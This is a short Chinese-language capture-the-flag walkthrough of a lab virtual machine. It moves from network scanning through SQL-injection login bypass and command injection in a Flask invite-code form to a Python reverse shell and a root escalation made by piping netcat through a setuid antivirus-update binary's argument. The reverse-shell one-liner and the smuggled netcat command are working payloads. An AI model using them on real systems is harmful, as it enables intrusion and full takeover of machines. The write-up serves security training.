信息搜集
首先ifconfig查看自己IP,
netdiscover查看同网段下主机
第三个应该是目标靶机。用nmap查看靶机开放端口:
开放22和8080,看看8080开的啥服务
WEB
看到让我们输入邀请码。有输入框的第一个反应是RCE,尝试几次后无果。后续测试SQL注入,发现在输入"时报错
Flask框架,最后一段报错信息直接看到搜索逻辑源码
输入其它内容时全部回显
推断布尔盲注,order by 尝试字段数
1" order by 1--+ 正常
1" order by 2--+ 报错
后续尝试
1" and left(version(),1)=5 --+
无果
直接:
1" or 1=1 --+
emmmm,进来了
还是看看能否RCE
输入111|ls
拿shell
出了,弹个shell试试
cat | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.112.72",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
成了
看看文件权限
有一个ROOT文件,下面有它的C文件,读一下看看
发现程序定义了一个执行参数,如果程序在执行中不包含参数,则会打印出:
This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam;
如果执行程序使用了参数,那么程序就会执行freshclam
可以试试提权:
./update_cloudav "666 | nc 192.168.112.72 5555|/bin/bash|nc 192.168.112.72 6666"
拿到ROOT权限
